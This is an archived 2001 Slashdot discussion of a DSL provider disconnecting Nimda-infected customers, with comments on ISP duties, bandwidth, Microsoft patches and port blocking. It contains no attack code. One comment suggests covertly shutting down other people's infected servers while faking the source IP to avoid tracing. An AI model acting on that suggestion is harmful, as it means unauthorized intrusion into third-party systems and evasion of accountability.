Follow Slashdot stories on Twitter


Forgot your password?
The Internet

Shutting Down Worm-Infected Broadband Users 594

disc-chord writes "Frustrated by Code Red and now Nimda, the DSL provider (a CLEC and reseller of Covad) has shut off 800+ infected customers. They claim they cannot get in touch with all of their customers, so they're just shutting them all down, and waiting for the customer to call them. When/if the customer does call they are informed that they are infected with the Nimda virus and must remove it before they will be reactivated. But how are customers supposed to fix the problem when their internet connection is shut down? " I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. The Internet is a peer-to-peer system where one peer can piss in the public pool. These ISPs are doing a good thing by keeping this crap off the net. Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users. At least this way they know what's up. Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes. ISPs shouldn't have to be responsible for their users this way, but they are responsible for keeping their other users online, and a few infected boxes can cause a lot of havoc for the whole net.
This discussion has been archived. No new comments can be posted.

Shutting Down Worm-Infected Broadband Users

Comments Filter:
  • by Ed Avis ( 5917 )
    Why is it an ISPs job to have any concern over what's passing across the wires? They are just packets and that should be that. If users wish to run systems which are configured to respond in a particular way to particular requests on port 80, that's the users' business.

    I don't see this as caring or responsible behaviour by the ISP - I see it as unwelcome nannying. As the poster said, users should be responsible for their own systems.
    • Re:Why? (Score:4, Interesting)

      by clare-ents ( 153285 ) on Friday September 21, 2001 @07:42AM (#2329109) Homepage
      You attempted to hack their webserver. Anyone who attempts to hack them gets their connection cut off. Seems a relatively sensible policy in the terms and conditions to me.

    • Re:Why? (Score:5, Interesting)

      by Jace of Fuse! ( 72042 ) on Friday September 21, 2001 @07:48AM (#2329126) Homepage
      They are just packets and that should be that.

      They care because the traffic generated by infected systems can be costly in both cash value and time. Not to mention the fact that there could be liability issues if they knew of infected systems but did nothing about it.

      Besides, if there are 3 vulnerable systems on a network, and 1 infected system, the responsible thing to do is to protect the 3 remaining uninfected systems.

      (This is a bit off topic, but I figured I'd mention it here for those who think that viruses and worms don't cost anyone any real money...

      Wednesday the 19th, my place of employment had to shut down entirely between the hours of about 7pm till around 10pm. Where I work, that kind of shut down costs tens of thousands of dollars. Not to mention all of the hourly workers who were sent home at 7pm. Since their shift ended at 11, they were literally out 4 hours of pay even though they don't actually work with the systems that were effected. Lost production. Lost sales. Lost wages. One tiny, preventable worm.)
      • Re:Why? (Score:4, Informative)

        by mjh ( 57755 ) <> on Friday September 21, 2001 @10:41AM (#2329769) Homepage Journal
        They care because the traffic generated by infected systems can be costly in both cash value and time. Not to mention the fact that there could be liability issues if they knew of infected systems but did nothing about it.

        Besides, if there are 3 vulnerable systems on a network, and 1 infected system, the responsible thing to do is to protect the 3 remaining uninfected systems.

        I don't believe that is the reason why the provider shutdown their customers. I believe the reason is that they have very specific expectations of bandwidth usage. And they use these expectations to create a nice little equation: for X broadband users we need to have f(X) available bandwidth from our service provider, where f(X) is significantly lower than sum(all user's subscription rates). So while they guarantee you 7x24 access (at whatever rate you paid for) they're only expecting you to be a user 1-2 hours a day, maybe 3-4 days a week. The virii turn your computer bandwidth usage into 7x24 at your subscribed rate. And this really screws up their equation. This is one of the reasons that several broadband providers don't allow you to have servers on your network. The usage patterns of your web server or email server are too unpredictable, and consequently they have to set a policy that forbids them.

        If they don't know about, or stop the virii, they end up with bad trending data. The trending data is what they used to determine whether or not f(X) was reasonable. When the trending data changes, so does f(X), and they have to spend more money believing that they need more bandwidth. Failure to do this results in customers switching to another provider. This is *especially* true of DSL customers for whom other providers are nearly guaranteed to exist (since DSL has open access). So, when a provider know that the trending data is bad, they have one of two choices:

        1. Fix the problem causing the bad trending data - i.e. turn off users who are infected. Hopefully, they will use good identification techniques to determine which users are actually infected. I wouldn't be surprised to see some providers who simply turn off any user who has used more than the expected bandwidth assuming that it must mean that they are infected.
        2. Try and explain to their management why the trending data is bad, and why it's conclusions should be ignored. This of course has the added disadvantage that even though the data is bad, customers are still experiencing denial of service.

        I guess I find myself agreeing with Taco, but only to a limited extent. The providers have to make at least some consession to the users who need to be able to download patches. It's easy for us in the *nix world to raise our noses at this. But don't forget that the very first Internet denial of service worm exploited sendmail. We're not immune. We're just not popular. And when the day comes that we are popular, I would like to think that there is a way for me to get the code that will resolve a problem that I didn't know I had.

    • Re:Why? (Score:4, Insightful)

      by Simon Brooke ( 45012 ) <> on Friday September 21, 2001 @08:27AM (#2329247) Homepage Journal
      Why is it an ISPs job to have any concern over what's passing across the wires?

      I pay a lot of money for my leased line. So do my ISP's other customers. A substantial fraction of my expensive bandwidth is being eaten up because other people (mostly also customers of my ISP) can't be bothered to patch their systems. The service my ISP is able to provide me is consequently degraded, and I'm not happy about it.

      If an ISP emerges who only accepts clueful customers, I'm likely to move my account. ISPs know this: if they don't switch off the clueless (and consequently troublesome) customers, they will lose the clueful (and consequently more profitable) ones.

      I'm getting to the point where I think there would be some merit in having to pass a test, like a driving test, before you can connect your computer to the public information infrastructure.

      • A substantial fraction of my expensive bandwidth is being eaten up because other people (mostly also customers of my ISP) can't be bothered to patch their systems.

        So the service provider should simply have bandwidth caps. Or bill users according to their usage. If someone wants to run an insecure system that eats up bandwidth, that's their concern.

        I can imagine a two-tier system where you choose either (a) metered bandwidth and keep out of my hair or (b) pay a fixed price but the ISP is allowed to snoop on what you do and block off your access if you're using too much.

        • So the service provider should simply have bandwidth caps. Or bill users according to their usage. If someone wants to run an insecure system that eats up bandwidth, that's their concern.

          Not if it's my bandwidth and I'm paying for it, it's not. Yes, so I could sue them. But frankly if they're too stupid to use a computer, cutting them off the Net is for their own good.

      • by Wansu ( 846 )
        I'm getting to the point where I think there would be some merit in having to pass a test, like a driving test, before you can connect your computer to the public information infrastructure.

        Perhaps with different classes of licenses?
    • Being a responsible sysadmin for any type of network includes shutting down problem areas that are clogging your network with unwelcome traffic, much like Nimda did this week.

      Our campus was affected rather badly by Nimda, and as a result the students were cut off from the network to make sure that they weren't infecting or being infected by the worm. The outage only lasted as long as it took McAfee to distribute the cleaning agent for it.

      If you have cancer, you cut it out, right?

      It's not unwelcome nannying, it's a necessary precaution. You do what you have to do to ensure that you maintain your level of service.

    • Re:Why? (Score:2, Interesting)

      by Herbmaster ( 1486 )

      There's no question if ISPs have the responsibility to shut down worm`ed users. In my opinion, no, it's not their job.

      The question is are ISPs entitled to shut down users just because they get infected? If they're being a good netizen by doing so (and they are), then yes, they should, because it benefits the community (their other customers, whom they have a responsibility to serve, mainly, but the entire internet essentially). Not because the worm uses up too much bandwidth; bandwidth is plentiful, but because proliferating the worm sucks eggs.

      I'd also like to note that this is not just a matter of "users should be responsible for their own systems." In the past, I would have absolutely agreed with this: users have the responsibility to make sure computers under their control are patched and safe to the best of their ability, and if a patch is out, it's their fault if they don't have it. But in the past few weeks I've been [unfortunately] using IIS frequently. I saw the worm hit my workplace on Wednesday and it really hurt. I also saw why so many are vulnerable to it: Microsoft makes keeping a server up to date a hellish process. Specifically, I refer to the facts that install CDs are only available in old, deprecated versions; it's often difficult to tell what version you're running, let alone what patch level; the numbering scheme for updates/patches/"service packs" is illogical and version numbers are often duplicated; and most importantly, that for some retarded reason applying patches in the wrong order can un-do fixes you've already applied. Microsoft has got to share some of the blame this time; maybe not as much as the perpetrators, or maybe even the users, but they fucked up.

    • I don't see this as caring or responsible behaviour by the ISP - I see it as unwelcome nannying.

      I hope this is a troll, but I fear it is not.

      If I leave the fence to my pool open, and my neighbor's kid walks in, falls into the pool, and drowns himself, I am liable not only for civil but also for criminal damages. If my dog gets loose and injures someone, I am also liable. Why, then, if my computer damages others' machines on the internet, should I not be liable for damages?

      What I think needs to happen is this: Any owner of an infected netblock needs to be assessed a charge if their computers damage or disrupt traffic on the Internet. The fines should be commensurate with the amount of damage caused. If I'm a major ISP and I own a large netblock that's affected (even if I sell parts of that netblock off), it should be my responsibility to track down the sources of that disturbance within my network and eradicate it, otherwise I should be punished.
      I no longer have any tolerance whatsoever for lazy or complacent admins; fines may finally force people to wake the fuck up and secure their goddamned machines and their networks. I mean, come on! Nimda exploits holes in Windows NT and 2000 that are over six months old, and it's done a pretty damned good job of showing me that there are plenty of clueless admins out there! These admins need to be dealt with, they're making life hard for the rest of us.

      You call it nannying. I call it being responsible.

  • AT&T Broadband shut down port 80 for everybody, if they were infected or not.. They should have only shut down infected people.

    • That is, uhm, stupid. Why would you shut down port 80 for infected machines? To prevent them from being infected twice? Shutting down port 80 for vulnerable machines is more sensible, but how do you tell them from the well-patched servers? Blocking ports isn't meant to be a punishment, it's supposed to be a preventive measure.
    • Road Runner in Central Florida has done the same thing. Don't know if it includes the rest of the country.

      At first I didn't know if they'd blocked just me, to stop the constant flood of email from my auto-notifier [] :-)
  • MS never fix? (Score:4, Insightful)

    by onion2k ( 203094 ) on Friday September 21, 2001 @07:37AM (#2329088) Homepage
    Microsoft will never fix the problem without making sure people have to pay a monthly subscription

    I could have sworn both the Code Red and Nimda (multiple) exploits were patched in October *last year*.

    Yes its the fault of the users not keeping their machines up-to-date, but please, don't blame this on MS when they released, and advertised, a patch promptly. Heck, it'd be like some idiot running an old version of Sendmail blaming the sendmail author(s) on his box getting hacked. If you're on the net, its you responibility to stay safe.
    • Re:MS never fix? (Score:3, Insightful)

      by Syberghost ( 10557 )
      He said "fix the problem", not "bandaid the current exploits".

      The problem is that security is nothing resembling a priority to Microsoft. Security is something to be added after the fact, by people who know little about designing a secure OS, in response to complaints. And at that, only if the complaints come from big customers.

      case in point [].
      • From words I hear, the lack of security isn't due to lack of programming skill, or any other such thing.
        It all comes down to MS knowing that anything they put in will eventually be hacked by some enterprising person.
        Now, if they claim they've built a secure OS, and it gets hacked, they may open themselves to litigation from many people, which is financially not a good thing.
        Therefore, they don't claim to have a highly secure OS.
        And as they don't claim to have a highly secure OS, then there's not much value in spending lots of R&D money it it to put it in the product if you can't tout it and leverage it for more sales.
        So, they put very basic 'security' in there (read, just about none), and never claim to have it anyway. So, no legal comeback, as they haven't made the claim, and lots of wide open holes that screw users over, as it's not financial sense for MS (not the rest of the world tho) to include reasonable security measures.
        I don't think MS really care too much how much money it costs businesses as a whole, who get virus infections, and need constant patching, as long as that burden of cost doesn't fall on them.
        Good financial sense, crap ethics.

    • What they *should* have done was stop pressing new Win2k CDs, and patch the master copy. Then press their new CDs with the patched version.

      This includes OEM install CDs.

      There's no excuse for a retail copy (either in a store, or through a vendor's "bundling" with a new system) of an OS with year-old security flaws to be vulnerable out-of-the-box to those flaws, especially when the company producing it not only knows about the flaws, but has patches available.

      MS is *in part* responsible for not keeping retail/OEM copies reasonably up-to-date. By reasonably, I mean something less than a year behind the times.

      That's not to say that lazy/ignorant admins aren't to blame for not patching their servers. That's their job, and their responsibility. But, newly installed/purchased copies should have been immune already. IMHO, at least.
      • MS is *in part* responsible for not keeping retail/OEM copies reasonably up-to-date.

        Except of course for the fact that they print most of them in advance and have large stores of the CDs, they're not just going to throw them all out when all it takes is 5 minutes once your server is online to patch any problems that have crept up.

        However I suppose that they could provide a patch disk with it, or a supplimental CD that does contain all necessary upgrades.

        Oh WAIT, that's right, that's what Windows Update is for!

        However you can only use Windows Update if you have a legally purchased copy of Windows... And I'll bet you that many many many of those people who are running vulnerable servers don't have a legal copy. Or just clicked "cancel" when Windows prompted them to update their system the first time it was connected to the internet.

        MS has done their job, maybe not the best way that they could have done it, but they provided all the tools needed, and even almost-automated the task of updating your system, all you have to do is follow the wizard. However most people just click "cancel" and never give it a second thought.

        And for all of you out there who are toting how MS is so insecure and buggy, lets keep in mind that you're comparing apples to oranges here. IIS has much much more functionality than Apache does, and it has been around much longer, unfortunately in this case longer means a more convoluted codebase =(. However I can't defend them by that really, because bugs like simple buffer overflow attacks should have been caught in testing, or shouldn't have ever happened in the first place. You'd think by now people would have learned their lessons about static sized buffers (or at least not checking the length of the input prior to storage)... Oh well.
        • I'd like to point out that a good half of the vulnerabilities that Nimda exploits are patches that are not available under Windows update, but only on, 'spec when deadling with Win2k Server and Advanced server. Windows Update is really only up to date for Win2k Pro, and consumer OSs such as Me, etc..
        • IIS has much much more functionality than Apache does, and it has been around much longer, unfortunately in this case longer means a more convoluted codebase,

          Please name one bit of functionality that IIS had that apache does not. The only thing I can think of is .asp, and that's because Microsoft wanted a proprietary way to do the things that Apache users were already doing with perl and php.

          The second bit is just insane. IIS was microsoft's late entry into the webserver wars, long after Apache was created. Apache, in turn, was "a patch-y" version of the old NCSA web server. I was going to get dates, but the NCSA httpd web pages [] haven't been updated since '96. There's some history here [], though. The IIS code base is convoluted mostly because they were rushing to catch up so that people didn't give money to Netscape for their Windows-based web servers.

    • I could have sworn both the Code Red and Nimda (multiple) exploits were patched in October *last year*.

      If MS was so interested in making the fix widely available, why hasn't it been included in a service pack? There *HAVE* been service packs issued since this patch was released.

    • So when are the authorities going to not only FIRE people for purching Msft products, but ARREST & PROSECUTE them for not patching and keeping them worm free and in general from pissing in the public pool? That's what I'd like to see since Msft wants to both 1) publish buggy and patch later 2) market their shiny baubles to the vast computer ignorant laity.

      Similarly, there's a certain division of responsibility when someone buys a car - if there are defective parts that might threaten the safety of other drivers (such as tire blowouts), it's the mfg's responsibility to send out recall notices and fix it; but it's also the owners responsbility to operate the vehicle in a safe manner. What happens in the software licensing world is the mfg assumes *NO* responsibility, even for defects that might endanger data or other people's PC's via a network (info 'superhighway').

      It gets really bizzare when you consider that software and all rights remains the property
      of the authors & publishers, but responsibility for it's misdeeds & FU's are the poor suckers who fell for the slick ads, don't read or understand EULA's, pirate the stuff, etc. That's like GM leasing cars with defective brakes, and holding the operator responsible for all damages that occur when they fail after pulling onto an off ramp and crashing into a child care facility.
    • having had to wade through 100+ web pages to examine the effects and side-effects and warnings and caveats associated with Microsoft's post-service-pack 2 patches while collecting them to install a "up-to-date" MS Win2000/IIS system, I can only assume this is a troll. Sendmail releases a new version that can be installed, not a three-year-old version you have to patch the bejeezus out of.
  • Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users.

    Confuse users? Bah! They get confused well enough on their own!

    My major issue with blocking ports is that, well, no ISP should! An ISP provides internet connectivity, and that's what they should do.

    Yes, I agree they should have some say so over what traffic comes and goes over their network (i.e. no spam, DoS attacks, etc), but I myself would not give any ISP my business if I knew they were making choices about which ports I can or can not use.

    I think they are doing the right thing by booting infected users. It's certainly better than any form of port blocking.
  • "I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. "

    I think the huge underlying problem is that a) people do *not* know their box is infected and b) if they do know, they have no idea what to do about it. Don't forget, most people are very timid and lack any basic knowledge regarding computers. All they know how to do, is double click on the word2k icon, or outlook, or whatnot.

    • but they are running IIS

      Which isn't a free web server, they should have paid plenty of $ to run it, they should be held responsible when it all goes wrong.

      reminds me of a story back when i owned an ISP.

      User bought 1 million email addresses or some amount and promptly spammed them all. When the flood of stuff came back (rejected addresses, flames etc.) we had to cope with it. We sent them an invoice for our incurred costs (as mentioned in our ToS) and they whined "but i didn't know".

      Well, tough.

      "I didn't know asbestos was poisonous" doesn't wash in court why should "but I didn't know" work for internet based damage?

      (ok the net is hardly life and death [usually] but you get my meaning)

      • but they are running IIS Which isn't a free web server, they should have paid plenty of $ to run it

        Actually, IIS is entirely free. Or at least it comes built into Windows 2000 and 98, and is downloadable for free for NT and 95.
  • Surely if a user is infected, the ISP could cut them off from the world but still allow them access to an internal ftp site with had patches to fix the problem?
    • I would think this approach would work:

      1) Cut them off entirely, forcing them to call in. (I used this approach with hacked boxes myself, when I ran an ISP. It's very effective.)

      2) When they call in, let them back on, but block port 80 BOTH directions, and email them the patches.

      3) When they say they've installed the patches, scan them to see if they're still vulnerable. If not, re-open port 80.

      There are some logistical problems with this (step 2 requires router changes, and networks that aren't designed to accomodate a change like this might not have the CPU cycles available on their routers for these kind of rules), but they are solveable.

      You'd have proof that you sent them the patches, and proof that they received them (they're gone from the mail spool), so you could prove in court if necessary that they didn't work with you to fix their problem. It seems sound, but if there are any other holes please let me know.
      • You'd have proof that you sent them the patches, and proof that they received them (they're gone from the mail spool), so you could prove in court if necessary that they didn't work with you to fix their problem. It seems sound, but if there are any other holes please let me know

        I'd say you went beyond the call of duity;

        It's not your machine that's infected; you do not have direct responsibility for what is on it or how it is configured / mis-configured. You did have a responsibility for general network stability and speed, and they're abusing it...even if unintentionally.

        • I'd say you went beyond the call of duity;

          Take 30 minutes out of your day to automate most of this process, and to write a simple script to do changes. Have it scan for bandwidth-wasting viruses (or all viruses - some ISPs have this on their mail servers and will block viruses at the smtp server). When it finds nimda or its kin, block that user to all sites except an ftp/http site with the patches, the info, and a short, simple explanation why their service has been cut (also throw in the number of a good computer store that will do in-house calls if you want). Really, I don't think you'd have to disable the pop3 server, and that way, you can send them an email explaining the reasons again. So either you get a call asking why the customer has no access, or else the customer reads the email, adds the patches, and goes back to the http site and runs the script that scans him again and reactivates the full account.

          Okay, its above the call of duty. But it doesn't take that much time, and it would be the ISP I would recommend to friends.

  • I was just asking someone why ISPs don't do this. Why should the subnet I'm get get punished because of users who don't know what they're doing. Obviously they're going to call tech support and then get a quick lesson on how to download and install an MS patch.

    I'd rather have the infected parties make some effort instead of the AT&T approach of just closing port 80 and letting the ignorant go unenlightened.

    New slogan? Patches are the new killer app!
  • by CunningPike ( 112982 ) <> on Friday September 21, 2001 @08:03AM (#2329177) Homepage
    I'm in favour of ISPs locking out infected machines that have demonstrated no attempt at fixing the problem. After all, these people have shown a blatant distregard of basic sysadmin responsibilies: how long has CodeRed been known about now?

    However, here's a suggestion for a better response than simply removing Internet access to/from infected machines. The ISP runs some kind of DMZ server, but on the DSL side. All web traffic from infect machines is redirected to that one server (via transparent proxying), all other traffic is blocked. That way the end user can instantly see what's wrong. The ISP can also mirror the relevant patches on the DMZ so the end-user can get back up again as fast as possible.

    It would take some setting up initially, but would reap substantial rewards in the long run.
    • by Tom ( 822 )
      nice idea, but quite impractical in real life - your routers won't survive this load.

      I work at an ISP, I know what I'm talking about. when code red ran rampant, we knew of a way to filter it out at the border routers, but the additional load would've killed them, so we didn't.
    • I work at a place that has done something similar. All traffic but port 80 is blocked and the user of an infected machine can only get to a web page (no matter what address he is trying to go to) that says they have been blocked because they are infected and then lists instructions for removal and mirrors the appropriate tools. When done, the fix is verified and they can continue.

    • by Telek ( 410366 )
      how long has CodeRed been known about now?

      Never mind that how long has the patches been available and posted prominantly on the MS web site listed under "critical updates"?

      Answer, much longer. IIRC several months prior to CodeRed coming out.

      It doesn't take a lot of work to pop on by to MS every now and then and download any critical/recommended patches. However it's pretty clear that most of these people aren't even aware that they were running a website, much less infected. However you must have had your head under a rock for a while to not have heard about it in the news. Bah, someone just write a proggy that shuts down these servers (one that works) and then go through the DShield database and shut'em all down. You could fake the IP address so it wouldn't be traceable anyways, or at the very least make it a program that you could give to ISPs so that they could run it against their networks to shut down anyone with these servers still running. But I guess that it's just as easy to have them terminate their client's connection. Bah.

      The problem, here, I would think, is that these boxen are probably sitting somewhere on the net not being maintained. I mean any sysadmin, or even any user who circuits the web should have heard about it by now. If they haven't, then they're most likely not really using the web on that connection, in which case cutting them off won't really get their attention (not directly at least) anyways.

      I wonder if there is any statistics on, in the past month, the boxes that have been recognized by their owners and patched. I find it hard to believe that you could account for the (still) 150+ CR hits a day that I get by just "ignorant" people or crappy sysadmins.

    • My ISP blocked all internal traffic to port 80 -- which means that NO ONE (not even us law-abiding Apache users) is able to run a webserver. The only circumvention is to move your server to a different port (8080.)

      The only problem is that now they are unable to tell which IIs servers are infected, which means that as soon as they turn 80 back on, it's all going to start again. *sigh*

    • This just gives Microsoft no reason to fix the deeper problems.

      I'm not bashing MS here. (At least, not trying to.)

      They make a system that is for people who don't want to have a deep understanding of how things work. [Just as I don't care how my car works, I just want it to go.] It strikes me therefore that it is MS responsibility to fix the problem. [Just as a car cannot be a public safety problem. It won't fly to say that owners must get under their hoods and adjust the frobulator bypass.] And I don't mean a hot patch or service pack fix. I mean a deeper fix. Do it right the first time.

      Your suggested approach is very nice in the short run. The ISP helps the entire Internet. Provides a very nice way for the customer to discover they're infected and fix it. But it puts a higher burden on the ISP, and takes away MS's incentive to get it right in the first place. Not a good long term trend.

      Much better IMHO for operators of infected systems to serve a 5 zillion year jail term and a public flogging, thus putting pressure on MS to prevent problems like this to begin with.

      [For the humor impaired moderators, I think you get my actual point here. A slight penalization of users puts pressure on MS. It's a sad state of affairs that I must add this disclaimer.]
  • Those affected should welcome this kind of action. After all, the internet provider is closing a backdoor for the customer. That backdoor (FULL system access!) would otherwise keep announcing itself to the world.
  • this worm is particularly nasty. it's really made my work week, that much is for sure.

    in response to the growing storm regarding users vs ISPs... (/me dons his asbestos shorts)

    yes users are responsible for their systems, they are responsible for watching patch levels, they are responsible for watching out for vulnerabilities. So many people throw up an IIS server or what-have-you on their DSL/Cable line it's not funny. Do you think all of them are subscribed to microsoft's Security advisory list? NTBugTraq? Do they even service pack their server or workstation? The answer is: no not everyone. The information required to be a good MS product admin is there, you just need to get it. If you're a legit microsoft product owner it ought to be required that you get a digest format of their advisories in e-mail weekly. (An even better question is: how many of these IIS servers are properly licensed ???)

    And for those of you that thought I was beating on the users hard up there...Yes it is the responsibility (nay, the duty) of the ISPs to protect their networks, and by mission of action the internet. I run apache as my webserver of choice, my logs flooded with attempts to find CMD.EXE and ROOT.EXE in all the right MS places tuesday night and into wednesday morning. A veritable denial of service attack. Here's the kicker: I'm on a dynamic IP! (nice about the randomization of searching in this worm...) Many requests were coming from my own ISPs network. Do you think they responded when I e-mailed them? no, they didn't.

    A good ISP shuts off a user who (knowingly or unknowingly) abuses their connection. What if this worm were more malicious? What if it caused data loss? Think of the liability that could impose, so'n'so's unpatched web server infected my unpatched webserver and blew away my e-commerce site. Who takes the blame? so'n'so? or so'n'so's ISP? ...Both, in my estimation. While I agree that it is the responsibility of the user to keep themselves patched, ISPs monitor network traffic, they can easily pay attention when a known high risk virus or worm is flooding their network.

    Don't even get me started on why worm/virus writers should be sending their exploits to anti-virus companies or other proper organizations instead of releasing them into the wild.

    • I agree... For example the phone company has a clause that is quite public that they WILL remove you from their network if you connect something to their phone line that messes it up or degrades it for other users.

      This isn't unprecedented, it been common practice for over 20 years.
  • I've had almost 25,000 incoming port 80 requests since this virus was unleashed. (That's with my Linux box running constantly.) It's nice to see an ISP doing something productive.

    To the naysayers, I'd like to point out that they aren't punishing people; just making them call to get their access back and make sure they're not infected. Remember, the bandwidth belongs to the ISP. They have to protect it.

    I wish BellSouth would do something similar, but they've always been clueless. Heck, many of these requests were from BellSouth servers!
    • the bandwidth belongs to the ISP. They have to protect it.

      Actually, no. The bandwith belongs to those who pay for it and that is the customer. Internet providers really have no business keeping packets of the net to save bandwith. They do however have the right to stop crackers and spammers if that is in their terms of service and I bet it is. If the service provider is nice, they can also try to protect their customers from crackers but as long as the actions are not covered by ToS, they should be prepared to stop nannying.

  • As I've said before I confidently predict that if this trouble keeps up (and it will), DSL providers will just start enforcing a blanket ban of all ports less than 1024.

    Yes it sucks, yes it's unfair and yes you'll probably have to pay fixe times your normal price to have it enabled but it'll deter those people who have no need to run a web server (ie. those who don't realise they're even running a web server) and will make the DSL providers life a little easier.

    You'll see.

  • I pay for DSL, i can run *WHATEVER* i want on it. Saying "tough beans" is a little short sighted.

    If, on the other hand, they would like to have me charged me (as in contact the RCMP [] or %your_local_federal_police%) for cracking i would 'understand'... the rule of law is always the highest order, to simply make endless arrays of rules in contracts - and force people to abide by them (least they go without(be martyrs)) then why have Law? Why have Legislature? Corporate COntracts for all manner of 'things' are creaping into every crack of life. These "contracts" force people to give up their rights in order to exist in a corporate controlled world... think IM nuts? go read some of the EULA discussed on /. this week... NO CONTRACT SHOULD EVER LIMIT FUNDEMENTAL HUMAN RIGHTS.

    This isnt exactly a 'cut and dry' issue, these contracts basically allow, arbitrary 'for the greater good' decisions to be made by the DSL providers... I know that their TOS probably say "no bandwidth hogging servers" but, when ALL DSL is provided under the same TOS it becomes a method for DSL providers to make decisions about what I may - and may not - run on my box. I pay for bandwidth, allowing them to decided what data i may send and rec oversteps the bounds on my 'RIPE FOR ABUSE' meter.

    Think of the Censorship analogy - if they can censor some speech, then they are only an 'arbitrary decision' away from censoring *YOUR* speech. Whats to stop them from saying "you cannot download streaming OGG because there is no publisher-protection-scheme built it, and you may be violating copyright...

    again, i may sound a bit unreasonable, or maybe paranoid, OBVIOUSLY I am not saying we want to allow these worms to run, but we must be weary of 'seemingly' reasonable decisions when made by 'powerful' (plutocratic) people.

    • Yes, I believe we are all wary of 'seemingly reasonable' decisions.
      However, I think pulling the plug on infected machines is a good thing.
      The only way to show people there's a problem is to make them wake up and smell the coffee.
      My ISP ( is pretty rough in a lot of areas. However, they were one of the first (when Code Red was running) to come to the decision to pull the plug. They sent an email to all users saying Code Red (and now Nimda) were in the wild. They explained how it propogated, and sent a set of links in the email to the patches, and sites for further info.
      They then warned strongly that the connection would be severed if the machines were found to be infected within a couple of days.
      Lo and behold, 2 days later, several connections were severed. However, the info email let a lot of people prepare for the event. If it wasn't patched by then, it was a case of either someone was away (in which case wouldn't miss the connection), or didn't know how to work through the patch. In which case, they were forced to call tech support, who would then give them great service on how to cure the ills.
      I think pulling the plug on home users while they're infected is a great move. It saves bandwidth, and helps everyone have a better time. And they may also be responsible for helping prevent further infection, saving more people's time and money.
      It's just a case of training. A gentle tap to say "No, this is naughty" is fair. It's no draconian act. And more than just "Seeming reasonable", I consider it both reasonable and fair.

    • by Telek ( 410366 )
      I pay for DSL, i can run *WHATEVER* i want on it.

      bull... what company do you go by that doesn't have a hugeass EULA?

      And keep in mine that EULAs and any sort of contract is 98% CYA... It's there with tonnes of clauses that you will violate every day but are there so that if you do something stupid, they have a contract saying that you're not allowed to do that. If everyone were to go 100% by their contract, they wouldn't be using the web at all. Yes, this does give them excessive power, but they don't exercise it unless they need to, which is why they still have clients. Same reason why noone reads the EULAs on software, they just click "yeah I agree lets get on with it". The EULAs are there so if you do something annoying, they can nail you for it.


      SO DON'T SIGN IT. It's your choice to sign up for an ISP that has a crazyass EULA. As long as there is competition there will be resonable TOSs, and when there isn't, that's where the goverment is supposed to step in to limit what they can do.

      I think that you're going a little haywire thou with your freedom thing. Try to redirect some of that energy to what's happening in the aftermath of the attacks, or towards MPAA or RIAA.
    • NO CONTRACT SHOULD EVER LIMIT FUNDEMENTAL HUMAN RIGHTS. Hello? Are we living on the same planet? We're talking about a virus that aggressivly scans the net and attempts to replicate itself. This virus sucks up bandwidth which is not, despite one /.er statement to the contrary, plentiful. Those who aren't yet infected are at risk of infection, or at the very minimum a DoS attack from those who are infected. To equate running an infected server to Freedom of Speech is ludicrous. To extend your analogy, by allowing infected customers to soak up bandwidth and DoS attack other customers (even if it is unknowingly), you are actively denying the rights of the uninfected customers. Now you have a decision to make; cut off those who are aiding the attacks, or cut off those who are not. Why should my system be removed from the net if it isn't doing anything harmful? If your system is spamming mine at such a ferocious rate that I can't serve legitimate traffic then you are denying me the service I have paid for. At this point your right to service ends, even if you are paying for your own connection. In the US we have freedom of speech, but that dosen't mean we can spread outright lies about others. We have the right to keep and bear arms, but that doesn't give us the right to shoot others indescriminately. Your rights end where others rights begin. And finally, access to the net is not a right. It is not garenteed in the Constitution. It's a service and a privilege that we pay to use. Can it facilitate free speech? Sure. Is it the sole medium for free speech? No. Like any other service if you abuse it you can, and should, be denied access. In the same manor in which you can have your drivers license revoked for abusing the privilage of driving.
  • They want to run this stupid MS Windoze OS, likely it's pirated anyhow(ever met someone who BOUGHT windows? I haven't), and then they're also too cheap to keep up with paying for Virus software to keep their ShitBox running. If everybody was forced to PAY for windoze, and then they had to go out and BUY additional software so windoze will continue to run, they'd all format and install Linux. I think the new XP is GREAT!!! the anti-piracy feature will surely get many to leave the darkside and join us in our quest for world domination. Shut them down and report them to the link below for Piracy from MS.

    • Hey, I bought just about every version of windows out.
      There again, I make money from supporting it from time to time (or used to, I now work happily in a Linux shop, running 50 odd Debian servers flat out around the world).
      Just knowing how to play with Windows and install/maintain is worth good money in times of hardship, and well worth the price I pay (I run it through my books, and get it deducted from tax anyway).
      So, now you've met someone who buys Windows.
      Make you any happier?? :)


    • Slow down, trollboy. Just because you don't know anyone who has bought a licensed version of windows doesn't mean nobody has. Its like me denying the existance of elephants because I've never seen one.

      Now take a deep breath, and repeat after me: "Linux is not the solution to every problem." There, that better? Oh, wait, you don't believe me? Here, let me show you a glimps into an alternative world where Microsoft runs GPL code and the Linux distros are for-profit companies.

      Slashdot - Alternative World Posting.

      Yet another linux worm has been found today, this one, like many others, primarily being spread by people with 2 or 3 year old distro versions, who are too lazy to patch their systems, or have pirated their versions and don't have any official support. Some of these people don't even know that they are running web servers, and most of them have improperly configured firewalls or none at all. Unfortunately, if these poor people could just run windows, with its easy "Windows Update", and a nice, simple graphical installation tool that can detect most hardware, and has 3rd party support for almost all hardware, the world would be a better place.

      Get the point? Consider nimda a vulnerability that affects unpatched machines that are often configured with additional services that the user doesn't need. The only reason why windows was the platform targetted and not linux is that windows is the dominate end-user OS. Linux wouldn't solve anything.

      OTOH, I paid for my copy of win98SE, and have an option to install a licensed copy of win2k from work. The software I use on the win32 platform is primarily free, such as TinyFirewall, VNC, Putty and Openoffice. My system has the latest patches, and the firewall is (hopefully) properly configured. ;) I haven't had to buy additional software so that windows would continue to run.

      The systems we sell at work all include a licensed copy of win**, and come complete with the latest, updated version of an anti-virus software package. The subscription for updates runs for a year, and then, IIRC, is renewable for another year for just $3.65. Even without using anti-virus software for over 3 years, I've never had a virus (I later installed a copy of antivirus software when I had to xfer files from work to home - better safe then sorry, especially when some files are from customers who might be infected).

